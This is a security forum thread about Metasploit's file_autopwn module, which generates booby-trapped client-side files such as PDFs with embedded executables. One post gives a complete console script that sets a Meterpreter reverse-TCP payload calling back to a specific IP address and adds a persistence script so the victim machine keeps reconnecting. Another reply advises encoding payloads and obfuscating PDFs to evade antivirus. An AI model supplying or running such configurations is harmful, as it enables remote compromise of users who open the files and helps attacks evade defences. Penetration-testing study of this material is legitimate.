Printable View
hi,
the relatively new msf 3 module auxiliary/server/file_autopwn is a very nice little feature to test all known file format client-side attacks.
Using this script will provide you a web page with the relevant msf3 files, where you can perform all your client-side tests for known vulnerabilities.
A quick video how to set it up can be found here...
http://zerohat.de/_shared_files/vide..._file_autopwn/
/brtw2003
[[solved]] the PDF I was using to inject was causing the error. and also the LPORT_WIN32 is default to 3333 (the rev shell listen port ) not sure how to pass the "OnlyFiles" actions but whatever..
NICe !
I got no luck with
windows_fileformat_adobe_pdf_embedded_exe_evil.pdf
I tried it locally with BT4 prefinal/svn update and with a different msf host from my site:
( tried to replace localhost with my IP to a different host no luck )
http://rmccurdy.com/scripts/msf_shells/out.txt
I know the windows_fileformat_adobe_pdf_embedded_exe_evil.pdf works so maybe I am missing something it looks as tho it is creating the files fine but I get a DOS box popup with the file_autopwn and nothing in wireshark ?
Code:
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3
wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressReleases/Press%20Releases/nga10_02.pdf
./msfconsole
db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21
setg INFILENAME /tmp/file3.pdf
use auxiliary/server/file_autopwn
set OUTPATH /tmp/1
set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run
Great content. Will have to try it out.
However, the video was extremely frustrating to watch with the video moving so much and missing so much of the scripts being shown and the commands being shown. If it could have just been full screen all the time without it zooming every 20 seconds it would have way more value for the person watching.
well, I'm not a big friend of sophisticated videos, nor explaining a step-by-step-i-m-super-l33t-hack$ng-guide; this info should be enough to start with and dive more into the amazing msf3 development...i know I zoomed too many times, but that's why there is a pause button...Quote:
Originally Posted by jaykay232
/brtw2003
-does you your /tmp/file.pdf exists (you must use a real pdf document)?Quote:
Originally Posted by opreat0r
be aware, currently there are also no obfuscation mechanism added, therefore payloads are easily detected by an up-to-date AV (run a simple for loop for all exe files and run msfencode with shikata-ga-nai)
PDF obfuscation, have a look around Didier Stevens blog or compress JS inside, like http://www.jslab.dk/tools.minify.php
for more advanced options, start msf3, load file_autopwn and execute 'show advanced'
/brtw2003
It was the PDF ! I used the one in your example and it works ( at least with pdf exe)
Nice video / tutorial, Went ahead and gave this a whirl, used just about the same syntax as you, just different locations and such, scripted it out, after running my script I get errors statingThis continues on as it loops through all my file format exploits, when it gets to the end it comes back saying done, found 2 exploit modules, and launches the attack, starts up the folder where I can find vulnerabilities.Code:Exploit failed: SQLite3::SQLException: library routine called out of sequence: SELECT * FROM "workspaces" WHERE ("workspaces"."name" = 'default' ) LIMIT 1
I was reading around and it appears this happens if there are too many connections to the database going on at once. I followed your instructions on how to fix an error within metasploit in regards to pools, doing that did not resolve this problem.
Any help is apprecaited.